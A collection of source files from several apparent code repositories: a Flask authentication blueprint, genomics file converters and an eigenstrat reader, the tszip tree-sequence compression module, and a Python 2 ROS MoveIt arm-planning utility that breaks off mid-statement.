{ "source": "AabhasKrJha/flask-dir", "score": 2 }
#### File: auth/basic_auth/basic_auth.py ```python from flask import Blueprint bp = Blueprint('basic-auth', __name__, url_prefix='/basic-auth') @bp.route('/') def index(): return '/auth/basic-auth' from .sqlite_auth import sqlite_auth_bp bp.register_blueprint(sqlite_auth_bp) ```
{ "source": "aabiddanda/gdc", "score": 2 }
#### File: aabiddanda/gdc/polysites2vcf.py ```python from __future__ import division, print_function import argparse, sys, pdb #Remember, in eigenstrat, 2 means "2 ref copies" CODES={ "A":"AA", "C":"CC", "G":"GG", "T":"TT", "R":"AG", "Y":"CT", "S":"GC", "W":"AT", "K":"GT", "M":"AC", "-":"..", "N":"..", } ################################################################################ def parse_options(): """ argparse """ parser=argparse.ArgumentParser() parser.add_argument('-i', '--input', type=argparse.FileType('r'), default="-") parser.add_argument('-c', '--chrom', type=str, default="") return parser.parse_args() ################################################################################ def main(options): """ Convert """ samples=[] include_ancients=False include_refs=False reading_header=True for line in options.input: if len(line)==1: continue elif line[:2]=="##" and reading_header: bits=line.split() if len(bits)<4: continue elif bits[1]!="..": continue elif bits[2][0]=="3" and include_refs: #Refs samples.append(bits[3]) elif bits[2][0]=="4": #C team samples.append(bits[7]) elif bits[2][0]=="5": #B team with cteam processing samples.append(bits[7]) elif bits[2][0]=="7" and include_ancients: #Ancients samples.append(bits[4].split(":")[0]) elif bits[2][0]=="8": #A/B team, original samples.append(bits[4].split(":")[0]) elif line[0]=="#" and reading_header: reading_header=False print("##fileformat=VCFv4.2") print("##source=polysites2vcf.py") print("##FORMAT=<ID=GT,Number=1,Type=String,Description=\"Genotype\">") print("#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\t"+"\t".join(samples)) elif not reading_header: bits=line.split() chrom=bits[0] if options.chrom and options.chrom!=chrom: continue poss=bits[1] idd=chrom+"_"+poss ref=bits[2][0] alleles=(bits[3]+bits[4]+bits[7]).upper() if include_refs and include_ancients: alleles=(bits[2]+bits[3]+bits[4]+bits[6]+bits[7]).upper() elif include_refs: alleles=(bits[2]+bits[3]+bits[4]+bits[7]).upper() elif include_ancients: alleles=(bits[3]+bits[4]+bits[6]+bits[7]).upper() gts = [CODES[x] for x in alleles] alt_alleles=list(set([x for x in "".join(gts) if (x!=ref and x!=".")])) if not len(alt_alleles): continue alt=",".join(alt_alleles) allele_map={ref:"0", ".":"."} for i,a in enumerate(alt_alleles): allele_map[a]=str(i+1) gt_strings=[allele_map[x[0]]+"/"+allele_map[x[1]] for x in gts] print("\t".join([chrom, poss, idd, ref, alt, "100", ".", ".", "GT"]+gt_strings)) else: print(line, file=sys.stderr) raise Exception("Header line in unexpected place") ################################################################################ if __name__=="__main__": options=parse_options() main(options) ``` #### File: aabiddanda/gdc/pyEigenstrat.py ```python from __future__ import division import numpy as np ################################################################################ # datatype definitions dt_snp1=np.dtype([("ID", np.str_, 16), ("CHR", np.str_, 2), ("POS", np.int32)]) dt_snp2=np.dtype([("ID", np.str_, 16), ("CHR", np.str_, 2), ("POS", np.int32), ("REF", np.str_, 1), ("ALT", np.str_, 1)]) dt_ind=np.dtype([("IND", np.str_, 32), ("POP", np.str_, 32)]) ########################################################################### def load(file_root, pops=None, inds=None, exclude_inds=None, snps=None): """ Investigate the geno file, and return either a packed or unpacked eigenstrat object as appropriate """ geno_file=open(file_root+".geno", "rb") head=geno_file.read(4) geno_file.close() if head == b"GENO": return packed_data(file_root, pops, inds, exclude_inds, snps) else: return unpacked_data(file_root, pops, inds, exclude_inds, snps) ########################################################################### class data(): """ Base class. """ def __init__(self, file_root, pops=None, inds=None, exclude_inds=None, snps=None): """ We expect to see files file_root.{snp,ind,geno}. the .geno file might be either packed or unpacked. """ snp,snp_include=load_snp_file(file_root, snps) ind,ind_include=load_ind_file(file_root, pops, inds, exclude_inds) # Snp and ind data self.snp=snp self.ind=ind self._file_root=file_root self._snp_include=snp_include self._ind_include=ind_include # Genotypes might be set later, geno file used for iterator. self._geno=None self._geno_file=self.open_geno_file(file_root) # Which snp are we on. self._isnp=0 def __iter__(self): return self # Interface follows: def open_geno_file(self, file_root): """ Open the genotype file. """ raise NotImplementedError("Don't call the base class") def geno(self): """ If this is called, load the whole genotype matrix, and return it buffer it in case we want to load it again. """ raise NotImplementedError("Don't call the base class") def next(self): raise NotImplementedError("Don't call the base class") ########################################################################### # END CLASS class unpacked_data(data): """ Read unpacked data """ def open_geno_file(self, file_root): """ Open the genotype file. """ return open(file_root+".geno", "r") def geno(self): """ If this is called, load the whole genotype matrix, and return it buffer it in case we want to load it again. """ if self._geno is not None: return self._geno geno=np.genfromtxt(self._file_root+".geno", dtype='i1', delimiter=1, usecols=np.where(self._ind_include)[0]) # If we only loaded one individual, don't drop the second dimension. if len(geno.shape)==1: geno.shape=(geno.shape[0],1) geno=geno[self._snp_include,:] self._geno=geno return geno # This is the key here .. def __next__(self): while True: line = self._geno_file.readline() self._isnp += 1 if self._snp_include[self._isnp-1]: break gt = np.array(list(line[:-1]), dtype='i1') gt = gt[self._ind_include] return gt ########################################################################### # END CLASS class packed_data(data): """ Read packed data """ def open_geno_file(self, file_root): """ Open the genotype file (in binary mode). Read the header. """ geno_file=open(file_root+".geno", "rb") header=geno_file.read(20) #Ignoring hashes if header.split()[0] != b"GENO": raise Exception("This does not look like a packedancestrymap file") nind,nsnp=[int(x) for x in header.split()[1:3]] self._nind=nind self._nsnp=nsnp self._rlen=max(48,int(np.ceil(nind*2/8))) #assuming sizeof(char)=1 here geno_file.seek(self._rlen) #set pointer to start of genotypes return geno_file def geno(self): """ If this is called, load the whole genotype matrix, and return it buffer it in case we want to load it again. """ if self._geno is not None: return self._geno geno=np.fromfile(self._file_root+".geno", dtype='uint8')[self._rlen:] #without header geno.shape=(self._nsnp, self._rlen) geno=np.unpackbits(geno, axis=1)[:,:(2*self._nind)] geno=2*geno[:,::2]+geno[:,1::2] geno=geno[:,self._ind_include] geno[geno==3]=9 #set missing values # If we only loaded one individual, don't drop the second dimension. if len(geno.shape)==1: geno.shape=(geno.shape[0],1) geno=geno[self._snp_include,:] self._geno=geno return geno def __next__(self): while True: if self._isnp >= self._nsnp: raise StopIteration() record=self._geno_file.read(self._rlen) self._isnp+=1 if self._snp_include[self._isnp-1]: break gt_bits=np.unpackbits(np.fromstring(record, dtype='uint8')) gt=2*gt_bits[::2]+gt_bits[1::2] gt=gt[:self._nind][self._ind_include] gt[gt==3]=9 #set missing values return gt ########################################################################### # END CLASS def load_snp_file(file_root, snps=None): """ Load a .snp file into the right format. """ snp_file=open(file_root+".snp", "r") line=snp_file.readline() bits=line.split() snpdt=dt_snp1 # does the snp file have the alleles in? snpcol=(0,1,3) if len(bits) not in [4,6]: raise Exception("SNP file should have either 4 or 6 columns") elif len(bits)==6: snpdt=dt_snp2 snpcol=(0,1,3,4,5) snp_file.seek(0) snp=np.genfromtxt(snp_file, dtype=snpdt, usecols=snpcol) snp_file.close() include=np.ones(len(np.atleast_1d(snp)), dtype=bool) if snps is not None: include=np.in1d(snp["ID"], snps) snp=snp[include] return snp,include ########################################################################### def load_ind_file(file_root, pops=None, inds=None, exclude_inds=None): """ Load a .ind file, restricting to the union of specified individuals and individuals in the specified populations. """ ind=np.genfromtxt(file_root+".ind", dtype=dt_ind, usecols=(0,2)) # ignore sex include=np.ones(len(ind), dtype=bool) if pops or inds or exclude_inds: include=np.zeros(len(ind), dtype=bool) if pops: include=np.in1d(ind["POP"], pops) if inds: include=np.logical_or(include, np.in1d(ind["IND"], inds)) if exclude_inds: include=np.logical_and(include, ~np.in1d(ind["IND"], exclude_inds)) ind=ind[include] return ind,include ########################################################################### ``` #### File: aabiddanda/gdc/vcf2eigenstrat.py ```python from __future__ import division import sys, getopt, gdc, pdb ################################################################################ def parse_options(): """ Options are described by the help() function """ options ={ "vcf":None, "out":"out", "ref":None, "indAsPop":False, "indmap":None } try: opts, args = getopt.getopt(sys.argv[1:], "v:o:r:i:", ["vcf", "out", "ref", "indmap", "indAsPop"]) print opts, args except Exception as err: print str(err) sys.exit() for o, a in opts: print o,a if o in ["-v","--vcf"]: options["vcf"] = a if o in ["-r","--ref"]: options["ref"] = a if o in ["-i","--ind"]: options["indmap"] = a if o in ["--indAsPop"]: options["indAsPop"] = True elif o in ["-o","--out"]: options["out"] = a print "found options:" print options return options ################################################################################ def main(options): """ Convert vcf to eigenstrat format (ind, snp and geno files) """ vcf=gdc.open2(options["vcf"]) snp, ind, geno = [open(options["out"]+x, "w") for x in [".snp", ".ind", ".geno"]] removed={"multiallelic":0, "indel":0} count=0 if options["indmap"]: pop_map={} sex_map={} ind_map_file=open(options["indmap"], "r") for line in ind_map_file: bits=line[:-1].split() pop_map[bits[0]]=bits[2] sex_map[bits[0]]=bits[1] ind_map_file.close() for line in vcf: if line[:2]=="##": # Comment line next elif line[:6]=="#CHROM": # Header line inds=line.split()[9:] if options["ref"]: ind.write(options["ref"]+"\tU\tREF\n") if options["indmap"]: for indi in inds: ind.write(indi+"\t"+sex_map.get(indi, "U")+"\t"+pop_map.get(indi, "POP")+"\n") elif options["indAsPop"]: for indi in inds: ind.write(indi+"\tU\t"+indi+"\n") else: for indi in inds: ind.write(indi+"\tU\tPOP\n") else: # data bits=line.split() if "," in bits[4]: removed["indel"]+=1 continue if len(bits[3])!=1 or len(bits[4])!=1: removed["multiallelic"]+=1 continue else: if bits[2]==".": bits[2]=bits[0]+":"+bits[1] snp.write(" ".join([bits[2], bits[0], "0.0", bits[1], bits[3], bits[4]])+"\n") geno_string="" if options["ref"]: geno_string="2" for gt in bits[9:]: geno_string+=decode_gt_string(gt) geno.write(geno_string+"\n") count+=1 [f.close for f in [ind, snp, geno]] print "Done. Wrote "+str(count) + " sites" print "Excluded " + str(sum(removed.values())) + " sites" for key in removed: print "Excluded " + str(removed[key]) + " " + key return ################################################################################ def decode_gt_string(gt_string): """ Tries to work out the genotype from a vcf genotype entry. 9 for missing [or not in {0,1,2}] """ gt=gt_string.split(":")[0] if len(gt)==1: if gt=="0": # haploid return "2" elif gt=="1": return "0" else: return "9" elif len(gt)==3: if gt[0]=="0" and gt[2]=="0": return "2" if gt[0]=="0" and gt[2]=="1": return "1" if gt[0]=="1" and gt[2]=="0": return "1" if gt[0]=="1" and gt[2]=="1": return "0" else: return "9" raise Exception("Unknown genotype: "+gt) ################################################################################ if __name__=="__main__": options=parse_options() main(options) ``` #### File: aabiddanda/gdc/vcf2freq.py ```python from __future__ import division, print_function from collections import defaultdict import argparse, sys import pdb ################################################################################ def parse_options(): """ Try using argparse """ parser=argparse.ArgumentParser() parser.add_argument('-i', '--input', type=argparse.FileType('r'), default="-") parser.add_argument('-p', '--panel', type=str, action="store", default=None, help= "Two column file mapping IDs to populations") return parser.parse_args() ################################################################################ def read_panel(panel_file): """ Open the panel file and return a dictionary that maps sample to popuation """ map={} pf=open(panel_file, "r") for line in pf: bits=line.split() map[bits[0]]=bits[1] pops=list(set(map.values())) pops.sort() return map, pops ################################################################################ def main(options): """ run through the file and output to stdout. """ map, pops=read_panel(options.panel) print("\t".join(["SNPID", "CHR", "POS", "REF", "ALT"]+pops)) samples=[] for line in options.input: if line.startswith("##"): pass elif line.startswith("#"): #Header line samples=line.split()[9:] else: #This is a data line. counts=defaultdict(int) totals=defaultdict(int) bits=line.split() first_cols=[bits[2], bits[0], bits[1], bits[3], bits[4]] for i in range(9, len(bits)): if samples[i-9] not in map: continue for j in [0,1]: if bits[i][j]=="0": totals[map[samples[i-9]]]+=1 if bits[i][j]=="1": counts[map[samples[i-9]]]+=1 totals[map[samples[i-9]]]+=1 freqs=[0.0]*len(pops) try: for i,pop in enumerate(pops): freqs[i]=counts[pop]/totals[pop] print("\t".join(first_cols+[format(x, "1.4f") for x in freqs])) except ZeroDivisionError: continue ################################################################################ if __name__=="__main__": options=parse_options() main(options) ```
{ "source": "aabiddanda/tszip", "score": 2 }
#### File: tszip/tszip/compression.py ```python import contextlib import json import logging import os.path import tempfile import warnings import zipfile from typing import Mapping import humanize import numcodecs import numpy as np import tskit import zarr from . import exceptions from . import provenance logger = logging.getLogger(__name__) FORMAT_NAME = "tszip" FORMAT_VERSION = [1, 0] def minimal_dtype(array): """ Returns the smallest dtype that can be used to represent the values in the specified array. If the array is not one of the integer types, the dtype of the array itself is returned directly. """ dtype = array.dtype if array.shape[0] == 0: return dtype if dtype.kind == "u": maxval = np.max(array) dtypes = [np.uint8, np.uint16, np.uint32, np.uint64] for dtype in map(np.dtype, dtypes): if maxval <= np.iinfo(dtype).max: break elif dtype.kind == "i": minval = np.min(array) maxval = np.max(array) dtypes = [np.int8, np.int16, np.int32, np.int64] for dtype in map(np.dtype, dtypes): if np.iinfo(dtype).min <= minval and maxval <= np.iinfo(dtype).max: break return dtype def compress(ts, path, variants_only=False): """ Compresses the specified tree sequence and writes it to the specified path. By default, fully lossless compression is used so that tree sequences are identical before and after compression. By specifying the ``variants_only`` option, a lossy compression can be used, which discards any information that is not needed to represent the variants (which are stored losslessly). :param tskit.TreeSequence ts: The input tree sequence. :param str destination: The string or :class:`pathlib.Path` instance describing the location of the compressed file. :param bool variants_only: If True, discard all information not necessary to represent the variants in the input file. """ destination = str(path) # Write the file into a temporary directory on the same file system so that # we can write the output atomically. destdir = os.path.dirname(os.path.abspath(destination)) with tempfile.TemporaryDirectory(dir=destdir, prefix=".tszip_work_") as tmpdir: filename = os.path.join(tmpdir, "tmp.trees.tgz") logging.debug(f"Writing to temporary file {filename}") with zarr.ZipStore(filename, mode="w") as store: root = zarr.group(store=store) compress_zarr(ts, root, variants_only=variants_only) os.replace(filename, destination) logging.info(f"Wrote {destination}") def decompress(path): """ Decompresses the tszip compressed file and returns a tskit tree sequence instance. :param str path: The location of the tszip compressed file to load. :rtype: tskit.TreeSequence :return: A :class:`tskit.TreeSequence` instance corresponding to the the specified file. """ with load_zarr(path) as root: return decompress_zarr(root) class Column: """ A single column that is stored in the compressed output. """ def __init__(self, name, array, delta_filter=False): self.name = name self.array = array self.delta_filter = delta_filter def compress(self, root, compressor): shape = self.array.shape chunks = shape if shape[0] == 0: chunks = (1,) dtype = minimal_dtype(self.array) filters = None if self.delta_filter: filters = [numcodecs.Delta(dtype=dtype)] compressed_array = root.empty( self.name, chunks=chunks, shape=shape, dtype=dtype, filters=filters, compressor=compressor, ) compressed_array[:] = self.array ratio = 0 if compressed_array.nbytes > 0: ratio = compressed_array.nbytes / compressed_array.nbytes_stored logger.debug( "{}: output={} compression={:.1f}".format( self.name, humanize.naturalsize(compressed_array.nbytes_stored, binary=True), ratio, ) ) def compress_zarr(ts, root, variants_only=False): provenance_dict = provenance.get_provenance_dict({"variants_only": variants_only}) if variants_only: logging.info("Using lossy variants-only compression") # Reduce to site topology. Note that we will remove # any sites, individuals and populations here that have no references. ts = ts.simplify(reduce_to_site_topology=True) tables = ts.tables with warnings.catch_warnings(): warnings.simplefilter("ignore") # When using a zipfile in Zarr we get some harmless warnings. See # https://zarr.readthedocs.io/en/stable/api/storage.html#zarr.storage.ZipStore root.attrs["format_name"] = FORMAT_NAME root.attrs["format_version"] = FORMAT_VERSION root.attrs["sequence_length"] = tables.sequence_length root.attrs["provenance"] = provenance_dict columns = {} for key, value in tables.asdict().items(): if isinstance(value, dict): for sub_key, sub_value in value.items(): columns[f"{key}/{sub_key}"] = sub_value else: columns[key] = value if variants_only: time = np.unique(tables.nodes.time) columns["node/time"] = np.searchsorted(time, tables.nodes.time) # Encoding array is a tuple so must be converted columns["encoding_version"] = np.asarray(columns["encoding_version"]) # Sequence length is stored as an attr for compatibility with older versions of tszip del columns["sequence_length"] # Schemas and metadata need to be converted to arrays for name in columns: if name.endswith("metadata_schema"): columns[name] = np.frombuffer(columns[name].encode("utf-8"), np.int8) if name.endswith("metadata"): columns[name] = np.frombuffer(columns[name], np.int8) # Some columns benefit from being quantised coordinates = np.unique( np.hstack( [ [0, ts.sequence_length], tables.edges.left, tables.edges.right, tables.sites.position, tables.migrations.left, tables.migrations.right, ] ) ) columns["coordinates"] = coordinates for name in [ "edges/left", "edges/right", "migrations/left", "migrations/right", "sites/position", ]: columns[name] = np.searchsorted(coordinates, columns[name]) # Some columns benefit from additional options delta_filter_cols = ["edges/parent", "sites/position"] # Note: we're not providing any options to set this here because Blosc+Zstd seems to # have a clear advantage in compression performance and speed. There is very little # difference between compression level 6 and 9, and it's extremely fast in any case # so there's no point in adding complexity. The shuffle filter in particular makes # big difference. compressor = numcodecs.Blosc( cname="zstd", clevel=9, shuffle=numcodecs.Blosc.SHUFFLE ) for name, data in columns.items(): Column( name, data, delta_filter="_offset" in name or name in delta_filter_cols ).compress(root, compressor) def check_format(root): try: format_name = root.attrs["format_name"] format_version = root.attrs["format_version"] except KeyError as ke: raise exceptions.FileFormatError("Incorrect file format") from ke if format_name != FORMAT_NAME: raise exceptions.FileFormatError( "Incorrect file format: expected '{}' got '{}'".format( FORMAT_NAME, format_name ) ) if format_version[0] < FORMAT_VERSION[0]: raise exceptions.FileFormatError( "Format version {} too old. Current version = {}".format( format_version, FORMAT_VERSION ) ) if format_version[0] > FORMAT_VERSION[0]: raise exceptions.FileFormatError( "Format version {} too new. Current version = {}".format( format_version, FORMAT_VERSION ) ) @contextlib.contextmanager def load_zarr(path): path = str(path) try: store = zarr.ZipStore(path, mode="r") except zipfile.BadZipFile as bzf: raise exceptions.FileFormatError("File is not in tgzip format") from bzf root = zarr.group(store=store) try: check_format(root) yield root finally: store.close() def decompress_zarr(root): coordinates = root["coordinates"][:] dict_repr = {"sequence_length": root.attrs["sequence_length"]} quantised_arrays = [ "edges/left", "edges/right", "migrations/left", "migrations/right", "sites/position", ] for key, value in root.items(): if isinstance(value, Mapping): for sub_key, sub_value in value.items(): if f"{key}/{sub_key}" in quantised_arrays: dict_repr.setdefault(key, {})[sub_key] = coordinates[sub_value] elif sub_key.endswith("metadata_schema"): dict_repr.setdefault(key, {})[sub_key] = bytes(sub_value).decode( "utf-8" ) else: dict_repr.setdefault(key, {})[sub_key] = sub_value elif key.endswith("metadata_schema"): dict_repr[key] = bytes(value).decode("utf-8") elif key.endswith("metadata"): dict_repr[key] = bytes(value) else: dict_repr[key] = value return tskit.TableCollection.fromdict(dict_repr).tree_sequence() def print_summary(path, verbosity=0): arrays = [] def visitor(array): if isinstance(array, zarr.core.Array): arrays.append(array) with load_zarr(path) as root: root.visitvalues(visitor) arrays.sort(key=lambda x: x.nbytes_stored) max_name_len = max(len(array.name) for array in arrays) stored = [ humanize.naturalsize(array.nbytes_stored, binary=True) for array in arrays ] max_stored_len = max(len(size) for size in stored) actual = [humanize.naturalsize(array.nbytes, binary=True) for array in arrays] max_actual_len = max(len(size) for size in actual) line = "File: {}\t{}".format( path, humanize.naturalsize(os.path.getsize(path), binary=True) ) print(line) if verbosity > 0: print("format_version:", root.attrs["format_version"]) prov = root.attrs["provenance"] print("provenance: ", end="") print(json.dumps(prov, indent=4, sort_keys=True)) fmt = "{:<{}} {:<{}}\t{:<{}}\t{}" line = fmt.format( "name", max_name_len, "stored", max_stored_len, "actual", max_actual_len, "ratio", ) print(line) for array, stored, actual in zip(arrays, stored, actual): ratio = 0 if array.nbytes > 0: ratio = array.nbytes_stored / array.nbytes line = fmt.format( array.name, max_name_len, stored, max_stored_len, actual, max_actual_len, f"{ratio:.2f}", ) print(line) if verbosity > 0: for line in str(array.info).splitlines(): print("\t", line) ```
{ "source": "AABL-Lab/hlpr_manipulation", "score": 2 }
#### File: src/hlpr_manipulation_utils/arm_moveit.py ```python import sys import os import rospy import moveit_commander import moveit_msgs.msg import moveit_msgs.srv import geometry_msgs.msg import std_msgs.msg import wpi_jaco_msgs.msg import wpi_jaco_msgs.srv from math import pi, floor, ceil, fabs print("*"*80) print("THIS FILE IS DEPRECATED, USE arm_moveit2.py INSTEAD") print("*"*80) class ArmMoveIt: def __init__(self, planning_frame='base_link', default_planner="RRTConnectkConfigDefault", orientation_tolerance=None): # Make sure the moveit service is up and running rospy.logwarn("Waiting for MoveIt! to load") try: rospy.wait_for_service('compute_ik') except rospy.ROSException, e: rospy.logerr("No moveit service detected. Exiting") exit() else: rospy.loginfo("MoveIt detected: arm planner loading") # Check if we're using the 7dof if os.environ.get("ROBOT_NAME") == 'poli2': is_7dof = True else: is_7dof = os.environ['VECTOR_HAS_KINOVA_7DOF_ARM'] # self.pose = geometry_msgs.msg.PoseStamped() ## Instantiate a RobotCommander object. This object is an interface to ## the robot as a whole. self.robot = moveit_commander.RobotCommander() ## Instantiate a PlanningSceneInterface object. This object is an interface ## to the world surrounding the robot. self.scene = moveit_commander.PlanningSceneInterface() ## Instantiate a MoveGroupCommander object. This object is an interface ## to one group of joints. In this case the group is the joints in the left ## arm. This interface can be used to plan and execute motions on the left ## arm. self.group = [moveit_commander.MoveGroupCommander("arm")] # Set orientation tolerance if provided if orientation_tolerance is not None: rospy.loginfo("Setting orientation tolerance to {}".format(orientation_tolerance)) self.group[0].set_goal_orientation_tolerance(orientation_tolerance) # Set the planner self.planner = default_planner # Set the planning pose reference frame self.group[0].set_pose_reference_frame(planning_frame) # Set continuous joint names if is_7dof: self.continuous_joints = ['joint_1','joint_3','joint_5','joint_7'] # NOTE: order that moveit currently is configured # ['joint_1, joint_2, joint_3, joint_4, joint_5, joint_6, joint_7'] self.continuous_joints_list = [0,2,4,6] # joints that are continous else: self.continuous_joints = ['shoulder_pan_joint','wrist_1_joint','wrist_2_joint','wrist_3_joint'] # NOTE: order that moveit currently is configured # ['right_shoulder_pan_joint', 'right_shoulder_lift_joint', 'right_elbow_joint', 'right_wrist_1_joint', 'right_wrist_2_joint', 'right_wrist_3_joint'] self.continuous_joints_list = [0,3,4,5] # joints that are continous def get_IK(self, newPose, root = None): ## from a defined newPose (geometry_msgs.msg.Pose()), retunr its correspondent joint angle(list) rospy.wait_for_service('compute_ik') compute_ik = rospy.ServiceProxy('compute_ik', moveit_msgs.srv.GetPositionIK) wkPose = geometry_msgs.msg.PoseStamped() if root is None: wkPose.header.frame_id = self.group[0].get_planning_frame() # name:odom else: wkPose.header.frame_id = root wkPose.header.stamp=rospy.Time.now() wkPose.pose=newPose msgs_request = moveit_msgs.msg.PositionIKRequest() msgs_request.group_name = self.group[0].get_name() # name: arm # msgs_request.robot_state = robot.get_current_state() msgs_request.pose_stamped = wkPose msgs_request.timeout.secs = 2 msgs_request.avoid_collisions = False try: jointAngle=compute_ik(msgs_request) ans=list(jointAngle.solution.joint_state.position[2:9]) if jointAngle.error_code.val == -31: print 'No IK solution' return None return ans except rospy.ServiceException, e: print "Service call failed: %s"%e def get_FK(self, root = 'base_link'): rospy.wait_for_service('compute_fk') compute_fk = rospy.ServiceProxy('compute_fk', moveit_msgs.srv.GetPositionFK) header = std_msgs.msg.Header() header.frame_id = root header.stamp = rospy.Time.now() fk_link_names = ['j2s7s300_ee_link'] robot_state = self.robot.get_current_state() try: reply=compute_fk(header,fk_link_names,robot_state) return reply.pose_stamped except rospy.ServiceException, e: print "Service call failed: %s"%e def get_FK_wpi(self, joints = None): rospy.wait_for_service('/jaco_arm/kinematics/fk') compute_fk = rospy.ServiceProxy('/jaco_arm/kinematics/fk', wpi_jaco_msgs.srv.JacoFK) if joints is None: joints = [pi,pi,pi,pi,pi,pi,pi] try: pose=compute_fk(joints) return pose except rospy.ServiceException, e: print "Service call failed: %s"%e def plan_targetInput(self, target, joint_flag): '''Generic target planner that what type is specified''' try: if (joint_flag): self.group[0].set_joint_value_target(self._simplify_joints(target)) else: self.group[0].set_pose_target(target) self.group[0].set_planner_id(self.planner) planAns=self.group[0].plan() return planAns except: print 'No plan found, see the moveit terminal for the error' print("Unexpected error:", sys.exc_info()[0]) return None def plan_targetInputWaypoint(self, targets, joint_flag, merged=False, current_joints=None): '''Generic target planner that what type is specified''' ## input: list of pose (geometry_msgs.msg.Pose()) ## output: plan from current pose all of the target poses ## If merge true - then a single large plan is returned ## If merge is false - then several plans in an array are returned # Plan each pose individually and stitch together try: full_plan = [] points = [] current_state = self.robot.get_current_state() if current_joints is not None: current_state = self.set_robot_state_joint_dict(current_joints) for target in targets: self.group[0].set_start_state(current_state) plan = self.plan_targetInput(target, joint_flag) if plan is not None: full_plan.append(plan) if merged: points = self.merge_points(points, plan.joint_trajectory.points) traj = plan.joint_trajectory current_state = self.set_robot_state_pose(traj) else: print 'No full plan found, see the moveit terminal for the error' return None if merged: plan = full_plan[0] plan.joint_trajectory.points = points return plan else: return full_plan except: print 'No plan found, see the moveit terminal for the error' print("Unexpected error:", sys.exc_info()[0]) return None def set_robot_state_pose(self, traj): '''Gets the current robot state pose and sets it to the joint pose''' cur_robot_state = self.robot.get_current_state() last_point = traj.points[-1].positions # convert the joints to array joints = [x for x in cur_robot_state.joint_state.position] for i in xrange(len(traj.joint_names)): # Find index of joint joint_name = traj.joint_names[i] idx = cur_robot_state.joint_state.name.index(joint_name) joints[idx] = last_point[i] # Set full joint tuple now cur_robot_state.joint_state.position = joints return cur_robot_state def set_robot_state_joint_dict(self, joint_dict): cur_robot_state = self.robot.get_current_state() joints = [x for x in cur_robot_state.joint_state.position] for joint_name in joint_dict: idx = cur_robot_state.joint_state.name.index(joint_name) joints[idx] = joint_dict[joint_name] cur_robot_state.joint_state.position = joints return cur_robot_state def merge_points(self, points, new_points): '''Merge two sets of points and taking into account time''' # Check if this is the first set if len(points) < 1: return new_points all_points = points # Pull out the last time from current points last_point_time = points[-1].time_from_start+rospy.Duration(0.1) for point in new_points: point.time_from_start = point.time_from_start+last_point_time all_points = all_points + [point] return all_points def _simplify_angle(self, angle): # Very simple function that makes sure the angles are between -pi and pi if angle > pi: while angle > pi: angle -= 2*pi elif angle < -pi: while angle < -pi: angle += 2*pi return angle def _simplify_joints(self, joint_dict): # Helper function to convert a dictionary of joint values if isinstance(joint_dict, dict): simplified_joints = dict() for joint in joint_dict: # Pull out the name of the joint joint_name = '_'.join(joint.split('_')[1::]) if joint_name in self.continuous_joints: simplified_joints[joint] = self._simplify_angle(joint_dict[joint]) else: simplified_joints[joint] = joint_dict[joint] elif isinstance(joint_dict, list): simplified_joints = [] for i in xrange(len(joint_dict)): a = joint_dict[i] if i in self.continuous_joints_list: simplified_joints.append(self._simplify_angle(a)) else: simplified_joints.append(a) return simplified_joints '''Older functions - left for backwards compatibility''' def plan_jointTargetInput(self,target_joint): ## input: target joint angles (list) of the robot ## output: plan from current joint angles to the target one try: self.group[0].set_joint_value_target(self._simplify_joints(target_joint)) self.group[0].set_planner_id(self.planner) planAns=self.group[0].plan() return planAns except: print 'No plan found, see the moveit terminal for the error' print("Unexpected error:", sys.exc_info()[0]) return None def plan_poseTargetInput(self,target_pose): ## input: tart pose (geometry_msgs.msg.Pose()) ## output: plan from current pose to the target one try: self.group[0].set_pose_target(target_pose) self.group[0].set_planner_id(self.planner) planAns=self.group[0].plan() return planAns except: print 'No plan found, see the moveit terminal for the error' print("Unexpected error:", sys.exc_info()[0]) return None def box_table_scene(self) : #Scene : add box # after loading this object/scene, need to do "add" ==> "planning scene" # in the rviz interface if one want to see the box rospy.sleep(2) self.scene.remove_world_object("table_box") p = geometry_msgs.msg.PoseStamped() p.header.frame_id = self.robot.get_planning_frame() p.pose.position.x = 1.64 p.pose.position.y = 0.0 p.pose.position.z = 0.25 p.pose.orientation.w = 0.0 self.scene.add_box("table_box",p,(0.75, 1, 0.5)) rospy.sleep(5) def wayPointIK(self, wps, numSteps = None, ik_root = None): if numSteps is None: numSteps = 3 jointWps = [] for i in range(0, len(wps)): jointP = self.get_IK(wps[i], ik_root) if jointP is None: jointWps = None break jointWps.append(jointP) return jointWps def ask_scene_integration(arm): # Ask the user if want to integrate a box scene answer= input("""\n Integrate a box as a table from code ? (1 or 0) (if 1: box can't be displaced nor resized by user, if 0: no scene (can always do add from rviz interface) ) \n""") if answer == 1: arm.box_table_scene() print "\n Box inserted; to see it ==> rviz interface ==> add button==> planning scene " return else: print "\n No scene added" return def ask_position(arm,tarPose): #Ask the user the values of the target position while True: try: inputPosition=input(""" \n Target position coord. (format: x,y,z or write -1 to take the robot current position ): """) if inputPosition == -1: inputPosition=tarPose.position return inputPosition except (ValueError,IOError,NameError): print("\n Please, enter the coordinate in the following format: x,y,z ") continue else: if len(list(inputPosition)) == 3: poseTmp= geometry_msgs.msg.Pose() poseTmp.position.x=inputPosition[0] poseTmp.position.y=inputPosition[1] poseTmp.position.z=inputPosition[2] return poseTmp.position else: print("\n Please, enter the coordinate in the following format: x,y,z ") continue def ask_orientation(arm,tarPose): # Ask the user the values of the target quaternion while True: try: inputQuat=input(""" \n Target quaternion coordi. (format: qx,qy,qz,qw or write -1 to take the robot current quaternion ):""") if inputQuat == -1: inputQuat=arm.group[0].get_current_pose().pose.orientation return inputQuat except (ValueError,IOError,NameError): print("\n Please, enter the coordinate in the following format: qx,qy,qz,qw ") continue else: if len(list(inputQuat)) == 4: poseTmp= geometry_msgs.msg.Pose() poseTmp.orientation.x=inputQuat[0] poseTmp.orientation.y=inputQuat[1] poseTmp.orientation.z=inputQuat[2] poseTmp.orientation.w=inputQuat[3] return poseTmp.orientation else: print("\n Please, enter the coordinate in the following format: qx,qy,qz,qw ") def main(): arm = ArmMoveIt() tarPose = geometry_msgs.msg.Pose() ## ask if integrate object scene from code or not ask_scene_integration(arm) while not rospy.is_shutdown(): ## Assigned tarPose the current Pose of the robot tarPose = arm.group[0].get_current_pose().pose ## ask input from user (COMMENT IF NOT USE AND WANT TO ASSIGN MANUAL VALUE IN CODE) tarPose.position = ask_position(arm,tarPose) tarPose.orientation = ask_orientation(arm,tarPose) ## Example of Assigned values for new targetPose to robot # tarPose.position.x = 0.89 # tarPose.position.y = 0.00 # tarPose.position.z = 0.32 # tarPose.orientation.x = 0.0 print '\n The target coordinate is: %s \n' 